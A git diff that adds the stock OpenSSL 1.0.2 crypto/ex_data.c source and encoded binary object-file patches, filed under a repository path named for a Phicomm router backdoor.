z!n{xBoNx6gob#<Qg>%03tin0p;^6XpIDcA%019)?pMnbK{AsDeIe+R<IOk6(g>(Ki
zsBq4ob}5|mr@ad2{OLJ`bN)1~aL%9ps&LMqK2<p9Pndtn@!|Z*uW-(vu2(qcPho{~
z{?w&#&Yv<0=ltn@g>(M2Tj88P@wvn0;fM1lt$tufpOM%I(#YE~!&*MQHBoP*2Mw)W
zycgDQ92n5*^Zi&s^M?8csG^Y|plS8V{=U9+7J6j+jdVTyLVtruEU3OYTd2?F@%7i(
zL0!`sc$LSu<S(ZLzzrUKx>ie0!=&Y^OGqg6n3Uk9py8bxE)iSVNf%u;HbTLC7yGh1
zz6Y-%PTK%AyX<E}1|-$-@lHomxBjXdwcY@I(dUiukqeK{`8c=n_$={mM_nENC=C?i
zjwAz0Jq&fH_>Iv&Uv`r{#t-+1=g;w51q{bm$MMk*HuxPW7oIoEZfIm(w)+PE;3Go^
z+YB)Lilu9yWF4mdffBJ5o<HNApy2pw{~qeUUkR+*AAd)6ik~09)S>Y2>=-}%^_Tl|
z{G7(dem?8~<p@0(_)d-QlWKpQrZPn!@UMS5IFHi#7ZCoau|}Ux{dWiK9-If*wYmNO
E2Zt2mVgLXD

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ex_data.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ex_data.c
new file mode 100644
index 0000000..5a3546a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ex_data.c
@@ -0,0 +1,644 @@
+/* crypto/ex_data.c */
+
+/*
+ * Overhaul notes;
+ *
+ * This code is now *mostly* thread-safe. It is now easier to understand in what
+ * ways it is safe and in what ways it is not, which is an improvement. Firstly,
+ * all per-class stacks and index-counters for ex_data are stored in the same
+ * global LHASH table (keyed by class). This hash table uses locking for all
+ * access with the exception of CRYPTO_cleanup_all_ex_data(), which must only be
+ * called when no other threads can possibly race against it (even if it was
+ * locked, the race would mean it's possible the hash table might have been
+ * recreated after the cleanup). As classes can only be added to the hash table,
+ * and within each class, the stack of methods can only be incremented, the
+ * locking mechanics are simpler than they would otherwise be. For example, the
+ * new/dup/free ex_data functions will lock the hash table, copy the method
+ * pointers it needs from the relevant class, then unlock the hash table before
+ * actually applying those method pointers to the task of the new/dup/free
+ * operations. As they can't be removed from the method-stack, only
+ * supplemented, there's no race conditions associated with using them outside
+ * the lock. The get/set_ex_data functions are not locked because they do not
+ * involve this global state at all - they operate directly with a previously
+ * obtained per-class method index and a particular "ex_data" variable. These
+ * variables are usually instantiated per-context (eg. each RSA structure has
+ * one) so locking on read/write access to that variable can be locked locally
+ * if required (eg. using the "RSA" lock to synchronise access to a
+ * per-RSA-structure ex_data variable if required).
+ * [Geoff]
+ */
+
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+
+/* What an "implementation of ex_data functionality" looks like */
+struct st_CRYPTO_EX_DATA_IMPL {
+        /*********************/
+    /* GLOBAL OPERATIONS */
+    /* Return a new class index */
+    int (*cb_new_class) (void);
+    /* Cleanup all state used by the implementation */
+    void (*cb_cleanup) (void);
+        /************************/
+    /* PER-CLASS OPERATIONS */
+    /* Get a new method index within a class */
+    int (*cb_get_new_index) (int class_index, long argl, void *argp,
+                             CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                             CRYPTO_EX_free *free_func);
+    /* Initialise a new CRYPTO_EX_DATA of a given class */
+    int (*cb_new_ex_data) (int class_index, void *obj, CRYPTO_EX_DATA *ad);
+    /* Duplicate a CRYPTO_EX_DATA of a given class onto a copy */
+    int (*cb_dup_ex_data) (int class_index, CRYPTO_EX_DATA *to,
+                           CRYPTO_EX_DATA *from);
+    /* Cleanup a CRYPTO_EX_DATA of a given class */
+    void (*cb_free_ex_data) (int class_index, void *obj, CRYPTO_EX_DATA *ad);
+};
+
+/* The implementation we use at run-time */
+static const CRYPTO_EX_DATA_IMPL *impl = NULL;
+
+/*
+ * To call "impl" functions, use this macro rather than referring to 'impl'
+ * directly, eg. EX_IMPL(get_new_index)(...);
+ */
+#define EX_IMPL(a) impl->cb_##a
+
+/* Predeclare the "default" ex_data implementation */
+static int int_new_class(void);
+static void int_cleanup(void);
+static int int_get_new_index(int class_index, long argl, void *argp,
+                             CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                             CRYPTO_EX_free *free_func);
+static int int_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
+static int int_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
+                           CRYPTO_EX_DATA *from);
+static void int_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
+static CRYPTO_EX_DATA_IMPL impl_default = {
+    int_new_class,
+    int_cleanup,
+    int_get_new_index,
+    int_new_ex_data,
+    int_dup_ex_data,
+    int_free_ex_data
+};
+
+/*
+ * Internal function that checks whether "impl" is set and if not, sets it to
+ * the default.
+ */
+static void impl_check(void)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    if (!impl)
+        impl = &impl_default;
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+}
+
+/*
+ * A macro wrapper for impl_check that first uses a non-locked test before
+ * invoking the function (which checks again inside a lock).
+ */
+#define IMPL_CHECK if(!impl) impl_check();
+
+/* API functions to get/set the "ex_data" implementation */
+const CRYPTO_EX_DATA_IMPL *CRYPTO_get_ex_data_implementation(void)
+{
+    IMPL_CHECK return impl;
+}
+
+int CRYPTO_set_ex_data_implementation(const CRYPTO_EX_DATA_IMPL *i)
+{
+    int toret = 0;
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    if (!impl) {
+        impl = i;
+        toret = 1;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+    return toret;
+}
+
+/****************************************************************************/
+/*
+ * Interal (default) implementation of "ex_data" support. API functions are
+ * further down.
+ */
+
+/*
+ * The type that represents what each "class" used to implement locally. A
+ * STACK of CRYPTO_EX_DATA_FUNCS plus a index-counter. The 'class_index' is
+ * the global value representing the class that is used to distinguish these
+ * items.
+ */
+typedef struct st_ex_class_item {
+    int class_index;
+    STACK_OF(CRYPTO_EX_DATA_FUNCS) *meth;
+    int meth_num;
+} EX_CLASS_ITEM;
+
+/* When assigning new class indexes, this is our counter */
+static int ex_class = CRYPTO_EX_INDEX_USER;
+
+/* The global hash table of EX_CLASS_ITEM items */
+DECLARE_LHASH_OF(EX_CLASS_ITEM);
+static LHASH_OF(EX_CLASS_ITEM) *ex_data = NULL;
+
+/* The callbacks required in the "ex_data" hash table */
+static unsigned long ex_class_item_hash(const EX_CLASS_ITEM *a)
+{
+    return a->class_index;
+}
+
+static IMPLEMENT_LHASH_HASH_FN(ex_class_item, EX_CLASS_ITEM)
+
+static int ex_class_item_cmp(const EX_CLASS_ITEM *a, const EX_CLASS_ITEM *b)
+{
+    return a->class_index - b->class_index;
+}
+
+static IMPLEMENT_LHASH_COMP_FN(ex_class_item, EX_CLASS_ITEM)
+
+/*
+ * Internal functions used by the "impl_default" implementation to access the
+ * state
+ */
+static int ex_data_check(void)
+{
+    int toret = 1;
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    if (!ex_data && (ex_data = lh_EX_CLASS_ITEM_new()) == NULL)
+        toret = 0;
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+    return toret;
+}
+
+/*
+ * This macros helps reduce the locking from repeated checks because the
+ * ex_data_check() function checks ex_data again inside a lock.
+ */
+#define EX_DATA_CHECK(iffail) if(!ex_data && !ex_data_check()) {iffail}
+
+/* This "inner" callback is used by the callback function that follows it */
+static void def_cleanup_util_cb(CRYPTO_EX_DATA_FUNCS *funcs)
+{
+    OPENSSL_free(funcs);
+}
+
+/*
+ * This callback is used in lh_doall to destroy all EX_CLASS_ITEM values from
+ * "ex_data" prior to the ex_data hash table being itself destroyed. Doesn't
+ * do any locking.
+ */
+static void def_cleanup_cb(void *a_void)
+{
+    EX_CLASS_ITEM *item = (EX_CLASS_ITEM *)a_void;
+    sk_CRYPTO_EX_DATA_FUNCS_pop_free(item->meth, def_cleanup_util_cb);
+    OPENSSL_free(item);
+}
+
+/*
+ * Return the EX_CLASS_ITEM from the "ex_data" hash table that corresponds to
+ * a given class. Handles locking.
+ */
+static EX_CLASS_ITEM *def_get_class(int class_index)
+{
+    EX_CLASS_ITEM d, *p, *gen;
+    EX_DATA_CHECK(return NULL;)
+        d.class_index = class_index;
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    p = lh_EX_CLASS_ITEM_retrieve(ex_data, &d);
+    if (!p) {
+        gen = OPENSSL_malloc(sizeof(EX_CLASS_ITEM));
+        if (gen) {
+            gen->class_index = class_index;
+            gen->meth_num = 0;
+            gen->meth = sk_CRYPTO_EX_DATA_FUNCS_new_null();
+            if (!gen->meth)
+                OPENSSL_free(gen);
+            else {
+                /*
+                 * Because we're inside the ex_data lock, the return value
+                 * from the insert will be NULL
+                 */
+                (void)lh_EX_CLASS_ITEM_insert(ex_data, gen);
+                p = gen;
+            }
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+    if (!p)
+        CRYPTOerr(CRYPTO_F_DEF_GET_CLASS, ERR_R_MALLOC_FAILURE);
+    return p;
+}
+
+/*
+ * Add a new method to the given EX_CLASS_ITEM and return the corresponding
+ * index (or -1 for error). Handles locking.
+ */
+static int def_add_index(EX_CLASS_ITEM *item, long argl, void *argp,
+                         CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                         CRYPTO_EX_free *free_func)
+{
+    int toret = -1;
+    CRYPTO_EX_DATA_FUNCS *a =
+        (CRYPTO_EX_DATA_FUNCS *)OPENSSL_malloc(sizeof(CRYPTO_EX_DATA_FUNCS));
+    if (!a) {
+        CRYPTOerr(CRYPTO_F_DEF_ADD_INDEX, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+    a->argl = argl;
+    a->argp = argp;
+    a->new_func = new_func;
+    a->dup_func = dup_func;
+    a->free_func = free_func;
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    while (sk_CRYPTO_EX_DATA_FUNCS_num(item->meth) <= item->meth_num) {
+        if (!sk_CRYPTO_EX_DATA_FUNCS_push(item->meth, NULL)) {
+            CRYPTOerr(CRYPTO_F_DEF_ADD_INDEX, ERR_R_MALLOC_FAILURE);
+            OPENSSL_free(a);
+            goto err;
+        }
+    }
+    toret = item->meth_num++;
+    (void)sk_CRYPTO_EX_DATA_FUNCS_set(item->meth, toret, a);
+ err:
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+    return toret;
+}
+
+/**************************************************************/
+/* The functions in the default CRYPTO_EX_DATA_IMPL structure */
+
+static int int_new_class(void)
+{
+    int toret;
+    CRYPTO_w_lock(CRYPTO_LOCK_EX_DATA);
+    toret = ex_class++;
+    CRYPTO_w_unlock(CRYPTO_LOCK_EX_DATA);
+    return toret;
+}
+
+static void int_cleanup(void)
+{
+    EX_DATA_CHECK(return;)
+        lh_EX_CLASS_ITEM_doall(ex_data, def_cleanup_cb);
+    lh_EX_CLASS_ITEM_free(ex_data);
+    ex_data = NULL;
+    impl = NULL;
+}
+
+static int int_get_new_index(int class_index, long argl, void *argp,
+                             CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                             CRYPTO_EX_free *free_func)
+{
+    EX_CLASS_ITEM *item = def_get_class(class_index);
+    if (!item)
+        return -1;
+    return def_add_index(item, argl, argp, new_func, dup_func, free_func);
+}
+
+/*
+ * Thread-safe by copying a class's array of "CRYPTO_EX_DATA_FUNCS" entries
+ * in the lock, then using them outside the lock. NB: Thread-safety only
+ * applies to the global "ex_data" state (ie. class definitions), not
+ * thread-safe on 'ad' itself.
+ */
+static int int_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad)
+{
+    int mx, i;
+    void *ptr;
+    CRYPTO_EX_DATA_FUNCS **storage = NULL;
+    EX_CLASS_ITEM *item = def_get_class(class_index);
+    if (!item)
+        /* error is already set */
+        return 0;
+    ad->sk = NULL;
+    CRYPTO_r_lock(CRYPTO_LOCK_EX_DATA);
+    mx = sk_CRYPTO_EX_DATA_FUNCS_num(item->meth);
+    if (mx > 0) {
+        storage = OPENSSL_malloc(mx * sizeof(CRYPTO_EX_DATA_FUNCS *));
+        if (!storage)
+            goto skip;
+        for (i = 0; i < mx; i++)
+            storage[i] = sk_CRYPTO_EX_DATA_FUNCS_value(item->meth, i);
+    }
+ skip:
+    CRYPTO_r_unlock(CRYPTO_LOCK_EX_DATA);
+    if ((mx > 0) && !storage) {
+        CRYPTOerr(CRYPTO_F_INT_NEW_EX_DATA, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    for (i = 0; i < mx; i++) {
+        if (storage[i] && storage[i]->new_func) {
+            ptr = CRYPTO_get_ex_data(ad, i);
+            storage[i]->new_func(obj, ptr, ad, i,
+                                 storage[i]->argl, storage[i]->argp);
+        }
+    }
+    if (storage)
+        OPENSSL_free(storage);
+    return 1;
+}
+
+/* Same thread-safety notes as for "int_new_ex_data" */
+static int int_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
+                           CRYPTO_EX_DATA *from)
+{
+    int mx, j, i;
+    char *ptr;
+    CRYPTO_EX_DATA_FUNCS **storage = NULL;
+    EX_CLASS_ITEM *item;
+    if (!from->sk)
+        /* 'to' should be "blank" which *is* just like 'from' */
+        return 1;
+    if ((item = def_get_class(class_index)) == NULL)
+        return 0;
+    CRYPTO_r_lock(CRYPTO_LOCK_EX_DATA);
+    mx = sk_CRYPTO_EX_DATA_FUNCS_num(item->meth);
+    j = sk_void_num(from->sk);
+    if (j < mx)
+        mx = j;
+    if (mx > 0) {
+        storage = OPENSSL_malloc(mx * sizeof(CRYPTO_EX_DATA_FUNCS *));
+        if (!storage)
+            goto skip;
+        for (i = 0; i < mx; i++)
+            storage[i] = sk_CRYPTO_EX_DATA_FUNCS_value(item->meth, i);
+    }
+ skip:
+    CRYPTO_r_unlock(CRYPTO_LOCK_EX_DATA);
+    if ((mx > 0) && !storage) {
+        CRYPTOerr(CRYPTO_F_INT_DUP_EX_DATA, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    for (i = 0; i < mx; i++) {
+        ptr = CRYPTO_get_ex_data(from, i);
+        if (storage[i] && storage[i]->dup_func)
+            storage[i]->dup_func(to, from, &ptr, i,
+                                 storage[i]->argl, storage[i]->argp);
+        CRYPTO_set_ex_data(to, i, ptr);
+    }
+    if (storage)
+        OPENSSL_free(storage);
+    return 1;
+}
+
+/* Same thread-safety notes as for "int_new_ex_data" */
+static void int_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad)
+{
+    int mx, i;
+    EX_CLASS_ITEM *item;
+    void *ptr;
+    CRYPTO_EX_DATA_FUNCS **storage = NULL;
+    if ((item = def_get_class(class_index)) == NULL)
+        return;
+    CRYPTO_r_lock(CRYPTO_LOCK_EX_DATA);
+    mx = sk_CRYPTO_EX_DATA_FUNCS_num(item->meth);
+    if (mx > 0) {
+        storage = OPENSSL_malloc(mx * sizeof(CRYPTO_EX_DATA_FUNCS *));
+        if (!storage)
+            goto skip;
+        for (i = 0; i < mx; i++)
+            storage[i] = sk_CRYPTO_EX_DATA_FUNCS_value(item->meth, i);
+    }
+ skip:
+    CRYPTO_r_unlock(CRYPTO_LOCK_EX_DATA);
+    if ((mx > 0) && !storage) {
+        CRYPTOerr(CRYPTO_F_INT_FREE_EX_DATA, ERR_R_MALLOC_FAILURE);
+        return;
+    }
+    for (i = 0; i < mx; i++) {
+        if (storage[i] && storage[i]->free_func) {
+            ptr = CRYPTO_get_ex_data(ad, i);
+            storage[i]->free_func(obj, ptr, ad, i,
+                                  storage[i]->argl, storage[i]->argp);
+        }
+    }
+    if (storage)
+        OPENSSL_free(storage);
+    if (ad->sk) {
+        sk_void_free(ad->sk);
+        ad->sk = NULL;
+    }
+}
+
+/********************************************************************/
+/*
+ * API functions that defer all "state" operations to the "ex_data"
+ * implementation we have set.
+ */
+
+/*
+ * Obtain an index for a new class (not the same as getting a new index
+ * within an existing class - this is actually getting a new *class*)
+ */
+int CRYPTO_ex_data_new_class(void)
+{
+    IMPL_CHECK return EX_IMPL(new_class) ();
+}
+
+/*
+ * Release all "ex_data" state to prevent memory leaks. This can't be made
+ * thread-safe without overhauling a lot of stuff, and shouldn't really be
+ * called under potential race-conditions anyway (it's for program shutdown
+ * after all).
+ */
+void CRYPTO_cleanup_all_ex_data(void)
+{
+    IMPL_CHECK EX_IMPL(cleanup) ();
+}
+
+/* Inside an existing class, get/register a new index. */
+int CRYPTO_get_ex_new_index(int class_index, long argl, void *argp,
+                            CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
+                            CRYPTO_EX_free *free_func)
+{
+    int ret = -1;
+
+    IMPL_CHECK
+        ret = EX_IMPL(get_new_index) (class_index,
+                                      argl, argp, new_func, dup_func,
+                                      free_func);
+    return ret;
+}
+
+/*
+ * Initialise a new CRYPTO_EX_DATA for use in a particular class - including
+ * calling new() callbacks for each index in the class used by this variable
+ */
+int CRYPTO_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad)
+{
+    IMPL_CHECK return EX_IMPL(new_ex_data) (class_index, obj, ad);
+}
+
+/*
+ * Duplicate a CRYPTO_EX_DATA variable - including calling dup() callbacks
+ * for each index in the class used by this variable
+ */
+int CRYPTO_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
+                       CRYPTO_EX_DATA *from)
+{
+    IMPL_CHECK return EX_IMPL(dup_ex_data) (class_index, to, from);
+}
+
+/*
+ * Cleanup a CRYPTO_EX_DATA variable - including calling free() callbacks for
+ * each index in the class used by this variable
+ */
+void CRYPTO_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad)
+{
+    IMPL_CHECK EX_IMPL(free_ex_data) (class_index, obj, ad);
+}
+
+/*
+ * For a given CRYPTO_EX_DATA variable, set the value corresponding to a
+ * particular index in the class used by this variable
+ */
+int CRYPTO_set_ex_data(CRYPTO_EX_DATA *ad, int idx, void *val)
+{
+    int i;
+
+    if (ad->sk == NULL) {
+        if ((ad->sk = sk_void_new_null()) == NULL) {
+            CRYPTOerr(CRYPTO_F_CRYPTO_SET_EX_DATA, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+    }
+    i = sk_void_num(ad->sk);
+
+    while (i <= idx) {
+        if (!sk_void_push(ad->sk, NULL)) {
+            CRYPTOerr(CRYPTO_F_CRYPTO_SET_EX_DATA, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+        i++;
+    }
+    sk_void_set(ad->sk, idx, val);
+    return (1);
+}
+
+/*
+ * For a given CRYPTO_EX_DATA_ variable, get the value corresponding to a
+ * particular index in the class used by this variable
+ */
+void *CRYPTO_get_ex_data(const CRYPTO_EX_DATA *ad, int idx)
+{
+    if (ad->sk == NULL)
+        return (0);
+    else if (idx >= sk_void_num(ad->sk))
+        return (0);
+    else
+        return (sk_void_value(ad->sk, idx));
+}
+
+IMPLEMENT_STACK_OF(CRYPTO_EX_DATA_FUNCS)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ex_data.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ex_data.o
new file mode 100644
index 0000000000000000000000000000000000000000..244f760d6ad95011e03c370d545513178ea37822
GIT binary patch
literal 10976
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
